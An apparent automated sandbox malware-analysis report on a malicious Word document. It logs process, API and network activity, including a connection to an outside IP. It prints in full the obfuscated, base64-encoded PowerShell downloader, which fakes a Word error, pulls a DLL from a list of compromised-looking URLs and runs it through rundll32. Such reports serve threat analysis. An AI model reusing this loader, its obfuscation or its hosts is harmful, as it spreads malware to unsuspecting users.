                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: rundll32.exe, 00000008.00000003.2110699368.0000000000389000.00000004.00000001.sdmpBinary or memory string: ntnagerVMware_S
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_006CC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001DC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004BC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007DC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_006BC4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                    Encrypted powershell cmdline option foundShow sources
                    Source: unknownProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                    Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mjwjtkxgnh\wyssufqxr.vub',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iiasa\gdao.xuk',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kjucifzppxjqp\brxqhmcbxcls.kkx',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Chaxbancxgzy\rbmbxmqpfdk.tvd',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Umbfypagzceb\sgdrbhhkrdu.ucy',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pegimmebijdsrjpt\trbcflzgrjlwmib.jho',Control_RunDLL
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqftsc\netes.ucb',Control_RunDLL
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAi